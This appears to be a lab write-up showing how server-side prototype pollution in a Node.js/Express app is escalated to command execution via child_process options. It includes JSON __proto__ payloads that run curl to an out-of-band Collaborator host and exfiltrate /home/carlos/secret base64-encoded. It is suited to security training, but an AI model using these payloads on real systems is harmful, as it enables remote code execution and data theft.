Exfiltrating sensitive data via server-side prototype pollution
This lab is built on Node.js
and the Express
framework. It is vulnerable to server-side prototype pollution because it unsafely merges user-controllable input into a server-side JavaScript object.
Due to the configuration of the server, it’s possible to pollute Object.prototype
in such a way that it is possible to inject arbitrary system commands that are executed on the server.
Reproduction and PoCs
Study the address change feature
Log in with
wiener:peter
and visit the account page. Submit the form for updating your billing and delivery address.In Burp, go to the Proxy -> HTTP history tab and find the
POST /my-account/change-address
request.When submitting the form, the data from the fields is sent to the server as JSON. The server responds with a JSON object that appears to represent your user. This has been updated to reflect the new address information.
Send the request to Burp Repeater.
Identify a prototype pollution source
In Repeater, add a new property to the JSON with the name
__proto__
, containing an object with a json spaces property.
"__proto__": {
"json spaces":10
}
Send the request.
In the Response panel, switch to the Raw tab. Notice that the JSON indentation has increased based on the value of your injected property. This strongly suggests that you have successfully polluted the prototype.
Probe for remote code execution
Go to the admin panel and observe that there’s a button for running maintenance jobs.
Click the button and observe that this triggers background tasks that cleanup the database and filesystem. This is a classic example of the kind of functionality that may spawn node child processes.
Try polluting the prototype with a set of malicious properties that control the options passed to the
child_process.execSync()
method. The injected command should trigger an interaction with the public Burp Collaborator server:
"__proto__": {
"shell":"vim",
"input":":! curl https://uywkxrh5o7yl6c9iauwoewp6xx3orff4.oastify.com\n"
}
Send the request.
In the browser, go to the admin panel and trigger the maintenance jobs. After a short delay, these fail to run.
In Burp, go to the Collaborator tab and poll for interactions. Observe that you have received several interactions. This confirms the remote code execution.
Exfiltrate the contents of the secret file
In Burp Repeater, modify the payload in your malicious input parameter to a command that exfiltrates the contents of the file
/home/carlos/secret
to the public Burp Collaborator server. The following is one approach for doing this:
"input":":! cat /home/carlos/secret | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"
Send the request.
In the browser, go to the admin panel and trigger the maintenance jobs again.
Go to the Collaborator tab and poll for interactions.
Notice that you have received a new HTTP POST request with a Base64-encoded body.
Decode the contents of the body to reveal the secret.
In browser, go to the lab banner and click Submit solution. Enter the decoded secret to solve the lab.
Exploitability
To solve the lab:
An attacker will need to already have escalated privileges, giving access to admin functionality; find a prototype pollution source that can be used to add arbitrary properties to the global Object.prototype
; identify a gadget that can be used to inject and execute arbitrary system commands; trigger remote execution of a command that leaks the contents of Carlos’s home directory (/home/carlos
) to the public Burp Collaborator server; exfiltrate the contents of a secret file in this directory to the public Burp Collaborator server; and submit the secret obtained from the file using the button provided in the lab banner.